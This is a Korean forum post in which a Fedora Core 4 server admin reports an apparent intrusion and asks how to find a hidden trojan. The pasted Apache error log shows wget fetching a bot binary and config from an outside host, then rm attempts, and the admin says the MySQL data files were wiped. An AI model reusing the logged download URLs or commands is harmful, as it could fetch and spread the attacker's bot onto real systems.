해킹당한듯 합니다.

lattente의 이미지

--05:44:41-- http://mansaohub.webcindario.com/bot/raw/dhcp
=> `dhcp'
Resolving mansaohub.webcindario.com... 216.66.18.50
Connecting to mansaohub.webcindario.com[216.66.18.50]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 206,432 [text/plain]

0K .......... .......... .......... .......... .......... 24% 72.85 KB/s
50K .......... .......... .......... .......... .......... 49% 258.56 KB/s
100K .......... .......... .......... .......... .......... 74% 156.04 KB/s
150K .......... .......... .......... .......... .......... 99% 273.40 KB/s
200K . 100% 15.56 MB/s

05:44:43 (145.76 KB/s) - `dhcp' saved [206,432/206,432]

--05:44:59-- http://mansaohub.webcindario.com/bot/1.config
=> `1.config'
Resolving mansaohub.webcindario.com... 216.66.18.50
Connecting to mansaohub.webcindario.com[216.66.18.50]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770 [text/plain]

0K 100% 7.34 MB/s

05:44:59 (7.34 MB/s) - `1.config' saved [770/770]

rm: cannot remove `.//mysql.sock': Operation not permitted
rm: cannot remove `.//mapping-root': Operation not permitted
rm: cannot remove directory `.//.ICE-unix': Operation not permitted
rm: cannot remove `.//mapping-lattente': Operation not permitted
rm: cannot remove `.//.font-unix/fs7100': Operation not permitted
rm: cannot chdir from `./' to `lost+found': Permission denied

아파치 에러로그에 위와같은 로그가 남고 난 후로
MyISAM타입의 DB data 파일이 싹 날아갔네요.
MYD, MYI, frm 등등이요.
chkrootkit 만으로는 찾아지지 않아서
rkhunter도 돌려보았는데 이렇다할 결과는 없었습니다.
한가지 chkrootkit 확인결과에서 표시되지않는 프로세스가
있다고 Trojan을 의심해보라고 하더군요.
허나 rkhunter에서는 ps 등등의 명령어에는 이상이 없다 합니다.
달리 확인해볼 방법이 있는지 아니면
Linux Fedora core 4 x86_64bit 운용하고 있으신분 계시면
ps 파일 좀 보내주실 수 있는지, 답변부탁드립니다.

댓글 달기

Filtered HTML

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

BBCode

  • 텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param>
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

Textile

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • You can use Textile markup to format text.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Markdown

  • 다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
  • Quick Tips:
    • Two or more spaces at a line's end = Line break
    • Double returns = Paragraph
    • *Single asterisks* or _single underscores_ = Emphasis
    • **Double** or __double__ = Strong
    • This is [a link](http://the.link.example.com "The optional title text")
    For complete details on the Markdown syntax, see the Markdown documentation and Markdown Extra documentation for tables, footnotes, and more.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Plain text

  • HTML 태그를 사용할 수 없습니다.
  • web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
  • 줄과 단락은 자동으로 분리됩니다.
댓글 첨부 파일
이 댓글에 이미지나 파일을 업로드 합니다.
파일 크기는 8 MB보다 작아야 합니다.
허용할 파일 형식: txt pdf doc xls gif jpg jpeg mp3 png rar zip.
CAPTCHA
이것은 자동으로 스팸을 올리는 것을 막기 위해서 제공됩니다.